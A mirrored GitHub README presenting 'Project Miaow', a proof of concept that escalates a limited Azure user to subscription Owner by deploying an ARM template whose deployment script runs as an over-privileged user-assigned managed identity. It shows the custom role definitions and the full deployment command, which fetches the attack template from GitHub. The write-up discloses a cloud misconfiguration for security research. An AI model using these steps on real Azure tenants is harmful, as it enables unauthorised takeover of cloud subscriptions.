GithubHelp home page GithubHelp logo

securehats / miaow Goto Github PK

View Code? Open in Web Editor NEW
7.0 0.0 1.0 1015 KB

Project Miaow is a prove of concept to escalate privileges in Microsoft Azure using an ARM template deployment

PowerShell 100.00%

miaow's Introduction

image

Project Miaow (Managed Identity Adds Owner)

image

Mr. KFC Harland Sanders has read and assign permissions on the User-Assigned Managed Identity

Custom Role User-Assigned Managed Identity User (custom role)

This role only gives permissions to read and assign a user-assigned managed identity to follow the least privilege

{
    "id": "/subscriptions/7570c6f7-9ca9-409b-aeaf-cb0f5ac1ad50/providers/Microsoft.Authorization/roleDefinitions/44e27d73-8dd7-4428-8bda-78406afb75c1",
    "properties": {
        "roleName": "Managed Identity Consumer",
        "description": "",
        "assignableScopes": [
            "/subscriptions/7570c6f7-9ca9-409b-aeaf-cb0f5ac1ad50"
        ],
        "permissions": [
            {
                "actions": [
                    "Microsoft.ManagedIdentity/userAssignedIdentities/*/read",
                    "Microsoft.ManagedIdentity/userAssignedIdentities/*/assign/action"
                ],
                "notActions": [],
                "dataActions": [],
                "notDataActions": []
            }
        ]
    }
}

The User Assigned Managed Identity super-owner has permission User Access Administrator on a specified scope, in this case the subscription level.

image

Mr. Harland has Deployment Administrator permissions on a resource group, and no further permissions within the subscription.

Custom Role: Deployment Administrator (permissions to create deployment script)

This role has less permissions than a contributor to follow the least privilege principle.

{
  "roleName": "Deployment Administrator",
  "description": "Configure least privilege for the deployment principal in deployment script",
  "type": "customRole",
  "IsCustom": true,
  "permissions": [
    {
      "actions": [
        "Microsoft.Storage/storageAccounts/*",
        "Microsoft.ContainerInstance/containerGroups/*",
        "Microsoft.Resources/deployments/*",
        "Microsoft.Resources/deploymentScripts/*"
      ],
    }
  ],
  "assignableScopes": [
    "[subscription().id]"
  ]
}

Harland has no access to the Resource group where the user assigned managed identity resides nor any other resources groups and resources in Azure.

image

Interesting note: when requesting the permissions of Mr. Harland via PowerShell, only the Resource Group permissions are shown. The custom role assignment to the user-assigned are not displayed.

image

Proof Of Concept

  1. Mr. Harland logs in to Azure PowerShell to deploy the template.

image

  1. Deploys an ARM template to the designated resource group that contains a deployment script
New-AzResourceGroupDeployment `
  -name miaow `
  -ResourceGroupName kentucky-fried-veggies `
  -TemplateObject ((Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/SecureHats/azure-misfit/azurekid/priv-esc/poc/priv-esc-arm-template/azuredeploy.json').Content | ConvertFrom-Json -AsHashtable) `
  -managedIdentityName 'super-owner' `
  -managedIdentityResourceGroup "azure-misfit" `
  -principalId "301dfac7-8f45-48ac-9868-e1f0e875385c"

NOTE: I am invoking the ARM template from GitHub so the repository does not need to be cloned to execute the deployment.

Provided parameters

name:                         The display name of the deployment to the Azure Resource Group
ResourceGroupName:            The name of the resource group which the user has access to
TemplateObject:               The ARM template to deploy to the target resource group.
managedIdentityName:          The name of the managed identity with role assignment permissions on a scope
managedIdentityResourceGroup: The resource group where the managed identity resides
principalId:                  The objectId of the user that is granted permissions via the deployment script

image

During the deployment in the target resource group, a storage account, container instance and deploymentScript resource is created.

The script in the DeploymentScript is executed in the context of the use assigned managed identity.
After completion the DeploymentScript will show Miaow

image

We are now OWNER of the subscription

image

miaow's People

Contributors

azurekid avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar

Forkers

red-infosec

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.